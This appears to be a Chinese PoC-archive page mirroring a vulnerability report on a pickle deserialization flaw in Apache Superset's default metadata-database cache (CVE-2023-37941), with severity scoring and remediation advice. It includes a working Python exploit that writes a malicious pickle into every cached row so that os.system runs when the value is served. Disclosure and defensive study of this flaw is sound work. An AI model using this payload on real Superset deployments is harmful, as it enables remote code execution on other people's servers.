关联漏洞
标题:
Apache Superset 代码问题漏洞
(CVE-2023-37941)
描述:Apache Superset是美国阿帕奇(Apache)基金会的一个数据可视化和数据探索平台。 Apache Superset 2.1.0 版本及之前版本存在代码问题漏洞,该漏洞源于如果具有对 Apache Superset 元数据数据库的写访问权限,他们就可以保留一个特制的 Python 对象,这可能会导致在 Superset 的 Web 后端上远程执行代码。
描述
Exploit on the default cache of superset by using pickle
介绍
# Exploitation of Pickle RCE within Superset's Default Cache
## Information
[ Author ] Dinis Cruz
[ Project ] Superset
## Description
Apache's superset presents different options for caching, all of which based on [Flask-Caching](https://flask-caching.readthedocs.io/en/latest/). A built-in cache is provided which serializes values for later retreival. This serialization and retreival are done using [Pickle](https://docs.python.org/3/library/pickle.html), which allows for the de-serialization of python objects and as such the execution of code.
The built-in cache writtes information within the metadata database, which means that an attacker with access to this database, can escalate their priviledges and gain remote access to the machine/container serving superset.
## Affected URL [or Component]
`MetaStoreCache` class, which uses the `PickleKeyValueCodec` class for serialization of information.
## Proof of Concept (PoC)
This issue was reproduced by first creating a clean superset install which will use the built-in cache as default.
With the already established knowledge that access to the database is needed to exploit this issue. We can update the values of all cached values with the pickle exploit. Later, once the value is served back to the user, the pickle module will serialize the data and execute our code. A python PoC can be found bellow.
```
import os
import psycopg2
import pickle5 as pickle
class RCE:
def __reduce__(self):
cmd = ('touch /tmp/evil.sh')
return os.system, (cmd,)
def exploit():
pickled = pickle.dumps(RCE())
con = psycopg2.connect(
database="superset",
user="superset",
password="superset",
host="localhost",
port= '5432'
)
cursor = con.cursor()
cursor.execute('''UPDATE key_value SET value = %s''', (psycopg2.Binary(pickled),))
con.commit()
if __name__ == '__main__':
exploit()
```
This script updates all values cached within the database, and once the data is served back to the user, a evil.sh file is created within the `/tmp` directory for demonstration purposes.
## Affected Users
All users could be impacted.
## CWE
- [CWE-502](https://cwe.mitre.org/data/definitions/502.html)
## [CVSS Score](https://www.first.org/cvss/specification-document)
- Attack Vector (AV) - Network (N)
- Attack Complexity (AC) - Low (L)
- Privileges Required (PR) - High (H)
- User Interaction (UI) - None (N)
- Scope (S) - Changed (C)
- Confidentiality (C) - High(H)
- Integrity (I) - High(H)
- Availability (A) - High(H)
> Score: 9.1
## Suggested Fix (Remediations)
While the fix is up to the superset team. The big problem relies on the usage of pickle for data serialization. As far as I understand from the commit [#23888](https://github.com/apache/superset/pull/23888) a shift was made to remove Pickle serialization from other components but this one was kept because of a need to "handle arbitrary binary types". The cleanest solution would be to switch to another serialization mechanism, however one could implement a restricted unpickler which is not a sure solution but would possibly require less work when implementing.
## Prerequisites
Access to the Metadata database in use by the superset instalation.
## Tools Used and Setup Required
No special setup, only to a python interpreter to generate the payload, the introdution of the malicious payload into the database can be made in a variety of ways.
文件快照
[4.0K] /data/pocs/222624ca722b26f83fea77e93a1801085388d728
├── [ 547] PoC.py
├── [3.4K] README.md
└── [223K] Report.pdf
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。